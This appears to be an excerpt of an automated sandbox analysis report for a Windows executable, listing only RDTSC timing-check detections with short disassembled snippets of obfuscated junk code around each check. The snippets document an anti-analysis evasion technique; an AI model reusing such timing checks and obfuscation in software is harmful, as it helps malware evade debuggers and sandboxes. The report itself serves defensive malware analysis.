Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E21F68 second address: E21F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E22051 second address: E22055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E22055 second address: E2205B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2C760 second address: E2C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2964B second address: E2964F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2E72B second address: E2E732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E315B5 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 je 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E31B67 second address: E31B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E31B6E second address: E31BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F43C9098CE8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1B58h], esi 0x0000002a push 00000000h 0x0000002c mov bl, 87h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2A69h] 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E31BB1 second address: E31BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E32BF7 second address: E32BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E32BFB second address: E32C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43C8AE007Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E31DB1 second address: E31DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jo 00007F43C9098CF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2A87F second address: E2A892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E37B38 second address: E37B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3BDB5 second address: E3BDBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3BDBB second address: E3BDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3BDC5 second address: E3BDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3BDCF second address: E3BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B653 second address: E3B657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B657 second address: E3B662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B7B4 second address: E3B7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B917 second address: E3B921 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B921 second address: E3B952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE007Ah 0x00000008 je 00007F43C8AE007Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F43C8AE007Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B952 second address: E3B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B956 second address: E3B96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E3B96B second address: E3B971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E40B04 second address: E40B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E40BD5 second address: E40BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E40D0A second address: E40D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jbe 00007F43C8AE0089h 0x00000017 jmp 00007F43C8AE0083h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007F43C8AE00A7h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43C8AE0087h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E459DC second address: E459E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E459E6 second address: E459F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E459F1 second address: E45A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CEBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E45B80 second address: E45B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E45B8F second address: E45B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F43C9098CE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E45B9F second address: E45BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E45CDF second address: E45CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E46135 second address: E46144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E46144 second address: E46148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E462C1 second address: E462D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C8AE0076h 0x00000008 js 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F43C8AE0082h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E4659F second address: E465A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC28C0 second address: DC28D1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C8AE007Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC28D1 second address: DC28E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F43C9098CE6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F43C9098CE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC28E9 second address: DC28ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC28ED second address: DC2903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F43C9098CF2h 0x0000000e jp 00007F43C9098CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5311B second address: E53135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jns 00007F43C8AE0076h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E532B7 second address: E532BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E532BB second address: E532D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C8AE0087h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E53458 second address: E5345E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5345E second address: E53462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E53462 second address: E534A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007F43C9098CE6h 0x00000015 jmp 00007F43C9098CEEh 0x0000001a pop ebx 0x0000001b jl 00007F43C9098CE8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E53E9C second address: E53EA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5A263 second address: E5A269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5A269 second address: E5A28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 je 00007F43C8AE0076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F43C8AE0076h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5A28A second address: E5A290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC9578 second address: DC9580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E58FC3 second address: E58FEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF0h 0x00000012 jmp 00007F43C9098CECh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E58FEC second address: E58FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E58FF4 second address: E58FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59191 second address: E59196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59347 second address: E59351 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59351 second address: E59357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5947B second address: E59480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59480 second address: E5948A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5948A second address: E59491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E595F4 second address: E59634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F43C8AE0076h 0x00000010 jmp 00007F43C8AE0085h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59634 second address: E5963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59A37 second address: E59A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E59A3B second address: E59A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E106DD second address: E106E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E106E1 second address: E106EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10902 second address: E10907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10907 second address: E1090E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10B8B second address: E10BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F43C8AE0076h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10CDB second address: E10CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10CE1 second address: E10CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10CE7 second address: E10D10 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF8h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10DC7 second address: E10E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jno 00007F43C8AE0088h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnl 00007F43C8AE0095h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E18 second address: E10E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E1D second address: E10E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E22 second address: E10E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F43C9098CE8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call 00007F43C9098CE9h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E57 second address: E10E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E5B second address: E10E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E61 second address: E10E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E79 second address: E10E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10E7D second address: E10EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F43C8AE0084h 0x0000000f pushad 0x00000010 jnl 00007F43C8AE0076h 0x00000016 jnc 00007F43C8AE0076h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 push esi 0x00000023 jnl 00007F43C8AE0076h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10EAB second address: E10EC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E10EC7 second address: E10EEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C8AE007Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1105F second address: E11068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E112FB second address: E11300 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E11817 second address: E11821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F43C9098CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5E39A second address: E5E3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E5E515 second address: E5E543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F43C9098CE6h 0x00000016 jmp 00007F43C9098CEAh 0x0000001b jg 00007F43C9098CE6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E61CD5 second address: E61CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
